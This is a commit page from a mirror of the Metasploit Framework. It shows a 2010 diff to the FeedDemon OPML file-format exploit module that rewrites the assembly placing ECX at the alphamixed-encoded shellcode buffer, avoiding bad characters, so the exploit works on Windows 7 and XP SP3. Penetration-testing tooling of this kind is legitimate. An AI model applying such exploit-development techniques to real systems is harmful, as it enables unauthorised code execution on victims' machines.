infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

update the set_ecx method to work on both win7 and xpsp3 

git-svn-id: file:///home/svn/framework3/trunk@9414 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-04 00:47:14 +00:00
parent c068e8e6dc
commit d7f2324b7b
1 changed files with 5 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/exploits/windows/fileformat/feeddemon_opml.rb
View File

@ -100,13 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote
footer = Rex::Text.to_unicode(foot_opml) footer = Rex::Text.to_unicode(foot_opml)
# Set ECX to point to the alphamixed encoded buffer (IIIII...) # Set ECX to point to the alphamixed encoded buffer (IIIII...)
# We use an offset from esp, while avoiding bad chars # We use, while avoiding bad chars, an offset from SEH ptr stored on the stack at esp+8
off = 0x410 off = 0x1ff2
set_ecx_asm = %Q| set_ecx_asm = %Q|
push esp mov ecx, [esp+8]
pop ecx sub ecx, #{0x01010101 + off}
add ecx, #{0x01010101 + off} add ecx, 0x01010101
sub ecx, 0x01010101
| |
set_ecx = Metasm::Shellcode.assemble(Metasm::Ia32.new, set_ecx_asm).encode_string set_ecx = Metasm::Shellcode.assemble(Metasm::Ia32.new, set_ecx_asm).encode_string